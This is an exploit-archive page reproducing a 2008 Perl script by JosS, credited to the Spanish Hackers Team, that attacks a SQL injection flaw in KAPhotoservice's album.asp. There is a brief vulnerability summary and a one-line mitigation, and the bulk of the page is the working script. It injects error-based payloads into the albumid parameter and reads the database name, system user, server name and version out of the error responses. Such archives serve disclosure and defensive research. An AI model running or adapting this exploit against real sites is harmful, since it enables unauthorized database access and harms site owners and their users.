header-logo
Suggest Exploit
vendor:
KAPhotoservice
by:
JosS
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: KAPhotoservice
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

KAPhotoservice (album.asp) Remote SQL Injection Exploit

KAPhotoservice is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable album.asp page. This can allow the attacker to gain access to the database and execute arbitrary code on the server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                KAPhotoservice (album.asp) Remote SQL Injection Exploit             +==--
--==+====================================================================================+==--
                     [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: KAPhotoservice (Payment)
[~] Demo: http://www.kaphotoservice.com/photoservice/
[~] Exploit: Remote SQL Injection [High]
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Vuln File: album.asp

[+] Exploit:

#!/usr/bin/perl

# KAPhotoservice - Remote SQL Injection Exploit
# Code by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com

use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

sub lw
{

my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
		   $linux="0";
	    }else{
		    $linux="1";
	    }
		if($linux){
system("clear");
}
else{
system("cls");
system ("title KAPhotoservice - Remote SQL Injection Exploit");
system ("color 02");
}

}

#*************************** expl ******************************


&lw;

print "\t\t########################################################\n\n";
print "\t\t#    KAPhotoservice - Remote SQL Injection Exploit     #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";


$host=$ARGV[0];
chop $host;
$host=$host."/album.asp?cat=&apage=&albumid=";

if(!$ARGV[0]) {
    print "\n[x] KAPhotoservice - Remote SQL Injection Exploit\n";
    print "[x] written by JosS - sys-project[at]hotmail.com\n";
    print "[x] usage: perl $0 [host]\n";
    print "[x] example: http://host.com/PHPWebquest\n";
    exit(1);
 }

@comando=("1+and+1=convert(int,db_name())","1+and+1=convert(int,system_user)","1+and+1=convert(int,\@\@servername)--",'1+and+1=convert(int,@@version)--');


for ($i=0;$i<=3;$i++)

{

my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;

if ( $doc =~ /Syntax\s(.*)<\/font>/mosix )
{

if ($comando[$i] eq "1+and+1=convert(int,db_name())")
{

print "db_name:\n";

$dbname = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$dbname\n\n";

}

if ($comando[$i] eq "1+and+1=convert(int,system_user)")

{

print "system_user:\n";

$systemuser = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$systemuser\n\n";

}

if ($comando[$i] eq "1+and+1=convert(int,\@\@servername)--")

{

print "servername:\n";

$servername = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$servername\n\n";

}

if ($comando[$i] eq '1+and+1=convert(int,@@version)--')

{

print "version:\n";

$version = $1 if ($doc =~ /.*?value\s'(.*?)'\sto.*/sm);
print "$version\n\n";

}

} # Cierre del if principal
} # cierre for


--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

# milw0rm.com [2008-03-18]

Navigation

Suggest Exploit

Services By CQR